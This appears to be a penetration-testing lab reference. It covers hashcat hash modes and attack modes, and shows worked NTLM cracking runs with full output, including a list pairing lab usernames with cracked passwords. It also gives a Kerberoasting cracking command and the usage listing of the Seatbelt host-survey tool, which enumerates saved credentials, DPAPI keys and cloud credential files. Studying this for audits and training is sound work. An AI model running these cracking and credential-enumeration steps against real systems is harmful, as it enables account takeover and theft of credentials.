  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)    | Instant Messaging Service
  22301 | Telegram Mobile App Passcode (SHA256)               | Instant Messaging Service
     23 | Skype                                               | Instant Messaging Service
  26600 | MetaMask Wallet                                     | Cryptocurrency Wallet
  21000 | BitShares v0.x - sha512(sha512_bin(pass))           | Cryptocurrency Wallet
  11300 | Bitcoin/Litecoin wallet.dat                         | Cryptocurrency Wallet
  16600 | Electrum Wallet (Salt-Type 1-3)                     | Cryptocurrency Wallet
  21700 | Electrum Wallet (Salt-Type 4)                       | Cryptocurrency Wallet
  21800 | Electrum Wallet (Salt-Type 5)                       | Cryptocurrency Wallet
  12700 | Blockchain, My Wallet                               | Cryptocurrency Wallet
  15200 | Blockchain, My Wallet, V2                           | Cryptocurrency Wallet
  18800 | Blockchain, My Wallet, Second Password (SHA256)     | Cryptocurrency Wallet
  25500 | Stargazer Stellar Wallet XLM                        | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256        | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                 | Cryptocurrency Wallet
  15700 | Ethereum Wallet, SCRYPT                             | Cryptocurrency Wallet
  22500 | MultiBit Classic .key (MD5)                         | Cryptocurrency Wallet
  22700 | MultiBit HD (scrypt)                                | Cryptocurrency Wallet
 
- [ Brain Client Features ] -
 
  # | Features
 ===+========
  1 | Send hashed passwords
  2 | Send attack positions
  3 | Send hashed passwords and attack positions
 
- [ Outfile Formats ] -
 
  # | Format
 ===+========
  1 | hash[:salt]
  2 | plain
  3 | hex_plain
  4 | crack_pos
  5 | timestamp absolute
  6 | timestamp relative
 
- [ Rule Debugging Modes ] -
 
  # | Format
 ===+========
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word
 
- [ Attack Modes ] -
 
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  9 | Association
 
- [ Built-in Charsets ] -
 
  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
  d | 0123456789                 [0-9]
  h | 0123456789abcdef           [0-9a-f]
  H | 0123456789ABCDEF           [0-9A-F]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff
 
- [ OpenCL Device Types ] -
 
  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor
 
- [ Workload Profiles ] -
 
  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless
 
- [ License ] -
 
  hashcat is licensed under the MIT license
  Copyright and license terms are listed in docs/license.txt
 
- [ Basic Examples ] -
 
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict
  Association      | $1$   | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule
 
If you still have no idea what just happened, try the following pages:
 
* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/
 
If you think you need help by a real human come to the hashcat Discord:
 
* https://discord.gg/HFS523HGBT

Examples

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt

This runs hashcat with workload profile 3 (High, the second highest) in attack mode 0 (Straight: each dictionary word is tried as-is) against the specified hash file, using the provided dictionary; -m 1000 selects the NTLM hash type.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
 
31d6cfe0d16ae931b73c59d7e0c089c0:                        
5bd9b7b6fce76d3aabfebee9debaa932:Warrior07               
87e968ead530264915a4b295c57c37d5:Tibbetts3               
5deaec4b57b859c25cdd0513fb7bc750:Patrique2238            
d8d9eee954da5f2d42fe72f862fa493f:Packardbell350          
9b5684b030226a1203e4e7b718a3f9df:Oozle11                 
23d26a03aa7102abce4805d88e568a78:KAMTPS20!!tim           
fe1f27a2561b61511588b0d24e333a7c:Chirmol01               
7a1f1fd59eb2b97041c74748ea6a68f8:BHLMSTz2                
bf459116e5854e34031997be8e13596d:Angels100%              
ca3f0e9ce3188b0602742da2976d6773:2soWht!a                
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:07:12 2022 (11 secs)
Time.Estimated...: Thu Mar 17 02:07:23 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1243.6 kH/s (0.03ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 11/36 (30.56%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Thu Mar 17 02:07:00 2022
Stopped: Thu Mar 17 02:07:24 2022

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule

This is the same as the command above except that it applies the mangling rule file best64.rule, so every dictionary word is also tried in each of its 77 rule-modified forms (the Rules: 77 line below); the keyspace grows from 14344384 to 1104517568 candidates, and hashcat skips the 11 hashes already recovered in the potfile.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 11 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1104517568
 
5ae44bf0a1e24c0b1ec96708f30e7b84:Smitten77               
92929561b2758f409df2b4a24a59c6f4:Alphabet23              
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
 
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:14:29 2022 (2 mins, 14 secs)
Time.Estimated...: Thu Mar 17 02:16:43 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Mod........: Rules (/usr/local/share/doc/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  8011.9 kH/s (1.14ms) @ Accel:256 Loops:77 Thr:1 Vec:8
Recovered........: 13/36 (36.11%) Digests
Progress.........: 1104517568/1104517568 (100.00%)
Rejected.........: 0/1104517568 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-77 Iteration:0-77
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[04a156616d6f]
 
Started: Thu Mar 17 02:14:28 2022
Stopped: Thu Mar 17 02:16:45 2022

hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d

This is similar to the commands above except that it uses attack mode 6 (Hybrid Wordlist + Mask): instead of a rule file, the mask ?d?d at the end of the command appends every two-digit combination to each dictionary word, giving 100 candidates per word (keyspace 1434438400).

sec@slingshot:~$ hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 13 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1434438400
 
7ce56170c73f9582fa348db88de2c192:Gathering81             
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:20:46 2022 (1 min, 9 secs)
Time.Estimated...: Thu Mar 17 02:21:55 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt), Left Side
Guess.Mod........: Mask (?d?d) [2], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.#2.........: 20964.9 kH/s (0.55ms) @ Accel:256 Loops:100 Thr:1 Vec:8
Recovered........: 14/36 (38.89%) Digests
Progress.........: 1434438400/1434438400 (100.00%)
Rejected.........: 0/1434438400 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-100 Iteration:0-100
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f3132333132] -> $HEX[042a0337c2a156616d6f7321033638]
 
Started: Thu Mar 17 02:20:34 2022
Stopped: Thu Mar 17 02:21:55 2022
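To see why the rule file and the ?d?d mask inflate the Keyspace line in the runs above, here is an added Python example (not hashcat's code and not part of the original page) that reproduces those keyspace figures from the Built-in Charsets table and turns a measured speed into a runtime estimate; the charset sizes, word count, rule count and speed are the ones printed in the output above.

```python
"""Keyspace and runtime estimates for hashcat attacks (added example, not hashcat's code)."""
from __future__ import annotations

# Candidate counts for hashcat's built-in charsets (from the Built-in Charsets table above).
BUILTIN_CHARSETS: dict[str, int] = {
    "l": 26, "u": 26, "d": 10, "h": 16, "H": 16, "s": 33, "a": 95, "b": 256,
}

# Figures taken from the three runs shown above.
ROCKYOU_WORDS = 14344384       # "Passwords.:" line for rockyou.txt
BEST64_RULES = 77              # "Rules: 77" with best64.rule
HYBRID_SPEED_HPS = 20964.9e3   # "Speed.#2" of the ?d?d run, in candidates per second


def mask_keyspace(mask: str, custom: dict[str, int] | None = None) -> int:
    """Return how many candidates a hashcat mask expands to.

    '?l', '?u', '?d', '?h', '?H', '?s', '?a', '?b' select built-in charsets,
    '?1'..'?4' user-defined ones (sizes passed in `custom`), '??' is a literal
    question mark, and any other character is a fixed literal (one choice).
    """
    sizes = dict(BUILTIN_CHARSETS)
    if custom:
        sizes.update(custom)
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1                    # literal character: exactly one choice
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        selector = mask[i + 1]
        if selector != "?":           # '??' is a literal '?'
            if selector not in sizes:
                raise ValueError(f"unknown charset ?{selector}")
            total *= sizes[selector]
        i += 2
    return total


def attack_keyspace(mode: int, words: int = 0, rules: int = 1,
                    mask: str = "", words2: int | None = None,
                    custom: dict[str, int] | None = None) -> int:
    """Total candidates for an attack mode, matching hashcat's 'Keyspace..:' line."""
    if mode == 0:                     # Straight: every word through every rule
        return words * rules
    if mode == 1:                     # Combination: every pair of words from two lists
        return words * (words if words2 is None else words2)
    if mode == 3:                     # Brute-force: the mask alone
        return mask_keyspace(mask, custom)
    if mode in (6, 7):                # Hybrid: every word extended by every mask value
        return words * mask_keyspace(mask, custom)
    raise ValueError(f"unsupported attack mode {mode}")


def estimate_runtime(keyspace: int, speed_hps: float) -> float:
    """Seconds needed to exhaust `keyspace` at `speed_hps` candidates per second."""
    if speed_hps <= 0:
        raise ValueError("speed must be positive")
    return keyspace / speed_hps


def format_duration(seconds: float) -> str:
    """Render a duration the way hashcat's status screen does, e.g. '1 min, 9 secs'."""
    whole = int(seconds)
    days, rem = divmod(whole, 86400)
    hours, rem = divmod(rem, 3600)
    mins, secs = divmod(rem, 60)
    parts = []
    if days:
        parts.append(f"{days} day{'s' if days != 1 else ''}")
    if hours:
        parts.append(f"{hours} hour{'s' if hours != 1 else ''}")
    if mins:
        parts.append(f"{mins} min{'s' if mins != 1 else ''}")
    parts.append(f"{secs} secs")
    return ", ".join(parts)


if __name__ == "__main__":
    # The three runs above plus an 8-character ?a brute force at the same CPU speed,
    # which shows why full brute force is out of reach without GPUs.
    runs = [
        ("-a 0 rockyou", attack_keyspace(0, words=ROCKYOU_WORDS)),
        ("-a 0 rockyou -r best64", attack_keyspace(0, words=ROCKYOU_WORDS, rules=BEST64_RULES)),
        ("-a 6 rockyou ?d?d", attack_keyspace(6, words=ROCKYOU_WORDS, mask="?d?d")),
        ("-a 3 ?a?a?a?a?a?a?a?a", attack_keyspace(3, mask="?a?a?a?a?a?a?a?a")),
    ]
    for label, space in runs:
        eta = format_duration(estimate_runtime(space, HYBRID_SPEED_HPS))
        print(f"{label:28} keyspace={space:>20,d}  at {HYBRID_SPEED_HPS / 1e6:.1f} MH/s ~ {eta}")
```

The estimate for the ?d?d run comes out at about 68 seconds, in line with the "1 min, 9 secs" hashcat reported for it.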

hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes

This command shows all the NT hashes we've cracked so far for the provided hash file, read back from the potfile: --username prints each result with its account name and --outfile-format 2 prints only the plaintext, so each line is user:password (an empty password, as for Guest and DefaultAccount below, shows as a bare user:).

sec@slingshot:~$ hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes
Guest:
DefaultAccount:
slopez:Tibbetts3
aparker:Oozle11
rgray:KAMTPS20!!tim
wrobinson:Patrique2238
mlara:Packardbell350
lstout:2soWht!a
tandersen:Angels100%
awalker:Chirmol01
mmiller:BHLMSTz2
vcollins:Warrior07
hhopkins:Alphabet23
kcooper:Smitten77
rduarte:Gathering81
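As an added example of using that --show output defensively (not hashcat's code and not part of the original page), the following Python reads a pwdump-style hash file, the layout --username expects, together with user:plain lines like those above and reports empty, short and shared passwords; the sample hash file and show output are constructed, with jdoe and svc_backup as made-up accounts.

```python
"""Password-audit summary from a pwdump-style hash file and hashcat --show output
(added example, not hashcat's code)."""
from __future__ import annotations

from collections import defaultdict

# NT hash of the empty password; it cracked to an empty plaintext in the first run above.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample input in pwdump format (user:rid:lmhash:nthash:::), the layout
# hashcat --username expects. The NT hashes for slopez and vcollins are the ones
# recovered in the runs above; jdoe reuses vcollins's hash to show detection of
# shared passwords, and svc_backup carries a made-up, uncracked hash.
SAMPLE_HASHFILE = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
slopez:1001:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
vcollins:1002:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jdoe:1003:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

# Constructed output of `hashcat -m 1000 --username --show --outfile-format 2` for it.
SAMPLE_SHOW_OUTPUT = """\
Guest:
slopez:Tibbetts3
vcollins:Warrior07
jdoe:Warrior07
"""


def decode_plain(plain: str) -> str:
    """Undo hashcat's $HEX[...] encoding, used when a plaintext holds non-printable bytes or ':'."""
    if plain.startswith("$HEX[") and plain.endswith("]"):
        return bytes.fromhex(plain[5:-1]).decode("utf-8", errors="replace")
    return plain


def parse_hashfile(text: str) -> dict[str, str]:
    """Map account name -> NT hash (lower-case hex) from pwdump lines."""
    accounts: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4 or len(fields[3]) != 32:
            raise ValueError(f"not a pwdump line: {line!r}")
        accounts[fields[0]] = fields[3].lower()
    return accounts


def parse_show_output(text: str) -> dict[str, str]:
    """Map account name -> recovered password from 'user:plain' lines."""
    cracked: dict[str, str] = {}
    for line in text.splitlines():
        if not line:
            continue
        user, sep, plain = line.partition(":")
        if not sep:
            raise ValueError(f"expected 'user:plain', got {line!r}")
        cracked[user] = decode_plain(plain)
    return cracked


def audit(accounts: dict[str, str], cracked: dict[str, str], min_length: int = 12) -> dict:
    """Summarize the findings a defender acts on: empty, cracked, short and shared passwords."""
    by_hash: dict[str, list[str]] = defaultdict(list)
    for user, nt_hash in accounts.items():
        by_hash[nt_hash].append(user)
    return {
        "total": len(accounts),
        "cracked": sorted(u for u in accounts if u in cracked),
        "uncracked": sorted(u for u in accounts if u not in cracked),
        "empty_password": sorted(u for u, h in accounts.items() if h == EMPTY_NT_HASH),
        "short_password": sorted(u for u in accounts
                                 if u in cracked and 0 < len(cracked[u]) < min_length),
        # Identical NT hashes mean identical passwords, visible even when nothing cracked.
        "shared_password": {h: sorted(users) for h, users in by_hash.items()
                            if len(users) > 1 and h != EMPTY_NT_HASH},
    }


def sample_report() -> dict:
    """Run the audit over the constructed sample data."""
    return audit(parse_hashfile(SAMPLE_HASHFILE), parse_show_output(SAMPLE_SHOW_OUTPUT))


if __name__ == "__main__":
    for key, value in sample_report().items():
        print(f"{key:16}: {value}")
```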

hashcat -m 13100 -a 6 /tmp/tickets /opt/passwords/passwords.txt ?d?d?d?d

This will attempt to crack Kerberos service ticket hashes (TGS-REP, mode 13100) in hybrid mode, trying each word from the password list with every four-digit suffix (mask ?d?d?d?d) appended.

Blog Posts

seatbelt

Description

Seatbelt is a C# project that performs a number of security-oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.

Platform: Windows
Author: @harmj0y and @tifkin_ are the primary authors
License: 3-Clause BSD
URL: https://github.com/GhostPack/Seatbelt

Usage

                        %&&@@@&&
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
                        &%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
                         #%%%%##,
 
 
Available commands (+ means remote usage is supported):
 
    + AMSIProviders          - Providers registered for AMSI
    + AntiVirus              - Registered antivirus (via WMI)
      AppLocker              - AppLocker settings, if installed
      ARPTable               - Lists the current ARP table and adapter information (equivalent to arp -a)
      AuditPolicies          - Enumerates classic and advanced audit policy settings
    + AuditPolicyRegistry    - Audit settings via the registry
    + AutoRuns               - Auto run executables/scripts/programs
      ChromeBookmarks        - Parses any found Chrome bookmark files
      ChromeHistory          - Parses any found Chrome history files
      ChromePresence         - Checks if interesting Google Chrome files exist
      CloudCredentials       - AWS/Google/Azure cloud credential files
      CredEnum               - Enumerates the current user's saved credentials using CredEnumerate()
      CredGuard              - CredentialGuard configuration
      dir                    - Lists files/folders. By default, lists users' downloads, documents, and desktop folders (arguments == [directory] [depth] [regex] [boolIgnoreErrors]
    + DNSCache               - DNS cache entries (via WMI)
    + DotNet                 - DotNet versions
      DpapiMasterKeys        - List DPAPI master keys
      EnvironmentPath        - Current environment %PATH$ folders and SDDL information
      EnvironmentVariables   - Current user environment variables
      ExplicitLogonEvents    - Explicit Logon events (Event ID 4648) from the security event log. Default of 7 days, argument == last X days.
      ExplorerMRUs           - Explorer most recently used files (last 7 days, argument == last X days)
    + ExplorerRunCommands    - Recent Explorer "run" commands
      FileInfo               - Information about a file (version information, timestamps, basic PE info, etc. argument(s) == file path(s)
      FirefoxHistory         - Parses any found FireFox history files
      FirefoxPresence        - Checks if interesting Firefox files exist
    + Hotfixes               - Installed hotfixes (via WMI)
      IdleTime               - Returns the number of seconds since the current user's last input.
      IEFavorites            - Internet Explorer favorites
      IETabs                 - Open Internet Explorer tabs
      IEUrls                 - Internet Explorer typed URLs (last 7 days, argument == last X days)
      InstalledProducts      - Installed products via the registry
      InterestingFiles       - "Interesting" files matching various patterns in the user's folder. Note: takes non-trivial time.
    + InterestingProcesses   - "Interesting" processes - defensive products and admin tools
      InternetSettings       - Internet settings including proxy configs and zones configuration
    + LAPS                   - LAPS settings, if installed
    + LastShutdown           - Returns the DateTime of the last system shutdown (via the registry).
      LocalGPOs              - Local Group Policy settings applied to the machine/local users
    + LocalGroups            - Non-empty local groups, "-full" displays all groups (argument == computername to enumerate)
    + LocalUsers             - Local users, whether they're active/disabled, and pwd last set (argument == computername to enumerate)
      LogonEvents            - Logon events (Event ID 4624) from the security event log. Default of 10 days, argument == last X days.
    + LogonSessions          - Windows logon sessions
    + LSASettings            - LSA settings (including auth packages)
    + MappedDrives           - Users' mapped drives (via WMI)
      MicrosoftUpdates       - All Microsoft updates.
      NamedPipes             - Named pipe names and any readable ACL information.
    + NetworkProfiles        - Windows network profiles
    + NetworkShares          - Network shares exposed by the machine (via WMI)
    + NTLMSettings           - NTLM authentication settings
      OfficeMRUs             - Office most recently used file list (last 7 days)
      OSInfo                 - Basic OS info (i.e. architecture, OS version, etc.)
      OutlookDownloads       - List files downloaded by Outlook
      PoweredOnEvents        - Reboot and sleep schedule based on the System event log EIDs 1, 12, 13, 42, and 6008. Default of 7 days, argument == last X days.
    + PowerShell             - PowerShell versions and security settings
      PowerShellEvents       - PowerShell script block logs (4104) with sensitive data.
      Printers               - Installed Printers (via WMI)
      ProcessCreationEvents  - Process creation logs (4688) with sensitive data.
      Processes              - Running processes with file info company names that don't contain 'Microsoft', "-full" enumerates all processes
    + ProcessOwners          - Running non-session 0 process list with owners. For remote use.
    + PSSessionSettings      - Enumerates PS Session Settings from the registry
    + PuttyHostKeys          - Saved Putty SSH host keys
    + PuttySessions          - Saved Putty configuration (interesting fields) and SSH host keys
      RDCManFiles            - Windows Remote Desktop Connection Manager settings files
    + RDPSavedConnections    - Saved RDP connections stored in the registry
    + RDPSessions            - Current incoming RDP sessions (argument == computername to enumerate)
      RecycleBin             - Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
      reg                    - Registry key values (HKLM\Software by default) argument == [Path] [intDepth] [Regex] [boolIgnoreErrors]
      RPCMappedEndpoints     - Current RPC endpoints mapped
    + SCCM                   - System Center Configuration Manager (SCCM) settings, if applicable
    + ScheduledTasks         - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
      SearchIndex            - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
      SecurityPackages       - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
      Services               - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
      SlackDownloads         - Parses any found 'slack-downloads' files
      SlackPresence          - Checks if interesting Slack files exist
      SlackWorkspaces        - Parses any found 'slack-workspaces' files
    + Sysmon                 - Sysmon configuration from the registry
      SysmonEvents           - Sysmon process creation logs (1) with sensitive data.
      TcpConnections         - Current TCP connections and their associated processes and services
      TokenGroups            - The current token's local and domain groups
      TokenPrivileges        - Currently enabled token privileges (e.g. SeDebugPrivilege/etc.)
    + UAC                    - UAC system policies via the registry
      UdpConnections         - Current UDP connections and associated processes and services
      UserRightAssignments   - Configured User Right Assignments (e.g. SeDenyNetworkLogonRight, SeShutdownPrivilege, etc.) argument == computername to enumerate
    + WindowsAutoLogon       - Registry autologon information
      WindowsCredentialFiles - Windows credential DPAPI blobs
    + WindowsDefender        - Windows Defender settings (including exclusion locations)
    + WindowsEventForwarding - Windows Event Forwarding (WEF) settings via the registry
    + WindowsFirewall        - Non-standard firewall rules, "-full" dumps all (arguments == allow/deny/tcp/udp/in/out/domain/private/public)
      WindowsVault           - Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
      WMIEventConsumer       - Lists WMI Event Consumers
      WMIEventFilter         - Lists WMI Event Filters
      WMIFilterBinding       - Lists WMI Filter to Consumer Bindings
    + WSUS                   - Windows Server Update Services (WSUS) settings, if applicable
 
 
Seatbelt has the following command groups: All, User, System, Slack, Chrome, Remote, Misc
 
    You can invoke command groups with "Seatbelt.exe <group>"
 
   "Seatbelt.exe -group=all" runs all commands
 
   "Seatbelt.exe -group=user" runs the following commands:
 
        ChromePresence, CloudCredentials, CredEnum, dir, DpapiMasterKeys,
        ExplorerMRUs, ExplorerRunCommands, FirefoxPresence, IdleTime,
        IEFavorites, IETabs, IEUrls, MappedDrives,
        OfficeMRUs, PuttyHostKeys, PuttySessions, RDCManFiles,
        RDPSavedConnections, SlackDownloads, SlackPresence, SlackWorkspaces,
